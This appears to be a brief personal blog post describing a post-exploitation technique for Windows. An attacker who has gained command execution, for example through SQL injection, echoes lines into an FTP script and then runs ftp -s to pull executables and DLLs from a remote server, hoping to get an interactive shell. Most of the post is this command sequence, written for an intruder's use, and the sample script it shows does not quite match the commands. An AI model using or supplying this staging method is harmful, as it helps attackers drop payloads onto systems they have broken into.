Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Google+ Github Stackoverflow MLA CORE Institutional Repo ORCID ID   ORCID iD

Once you have basic, non-interactive shell access to a Windows box, there are a limited number of ways in which you can transfer files to the remote host. This brief article will explicate the echo/ftp method.

If you can execute, be it by SQL Injection, or a webserver vulnerability the echo command, then you can write a script file which can fetch a file of your choosing from a remote host.

The sequence of commands you issue should be in the following format:

echo open [ip] [port] >> ftpscript.txt
echo [user]>> c:\inetpub\scripts\ftpscript.txt
echo [pw] >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.exe >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.txt >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.dll >> c:\inetpub\scripts\ftpscript.txt
echo quit >> c:\inetpub\scripts\ftpscript.txt

This will create a file at c:\inetpub\scripts\ftpscript.txt that looks like this:

open [ip] [port]
get xxx.exe
get xxx.txt
get xxx.dll

If you then execute ftp -s:c:\inetpub\scripts\ftpscript.txt, your files will be fetched from the remote FTP server and you can hopefully secure some form of interactive shell access.